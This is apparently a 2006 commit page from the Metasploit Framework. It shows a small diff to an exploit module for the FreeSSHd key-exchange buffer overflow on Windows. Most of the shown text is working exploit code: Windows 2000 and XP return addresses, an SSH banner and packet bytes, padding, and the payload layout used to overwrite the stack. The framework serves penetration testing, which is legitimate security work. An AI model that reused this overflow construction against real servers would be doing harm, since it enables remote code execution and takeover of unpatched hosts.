since i installed the previous stuff, thought i'd clean up another module.

git-svn-id: file:///home/svn/framework3/trunk@4185 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2006-12-10 22:21:47 +00:00
parent b471b077d5
commit 603f58a90c
1 changed files with 4 additions and 4 deletions

View File

@ -37,7 +37,7 @@ class Exploits::Windows::Ssh::Freesshd_key_exchange < Msf::Exploit::Remote
[
[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ],
[ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e51877 } ],
[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ],
[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ],
],
'Privileged' => true,
@ -46,7 +46,7 @@ class Exploits::Windows::Ssh::Freesshd_key_exchange < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options( [ Opt::RPORT(22) ], self)
register_options( [ Opt::RPORT(22) ], self.class)
end
@ -56,8 +56,8 @@ class Exploits::Windows::Ssh::Freesshd_key_exchange < Msf::Exploit::Remote
sploit = "SSH-2.0-OpenSSH_3.9p1"
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
sploit << Rex::Text.rand_text_alphanumeric(1055, payload_badchars) + [target.ret].pack('V')
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(23500, payload_badchars) + "\r\n"
sploit << Rex::Text.rand_text_alphanumeric(1055) + [target.ret].pack('V')
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(19000) + "\r\n"
res = sock.recv(22)
if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)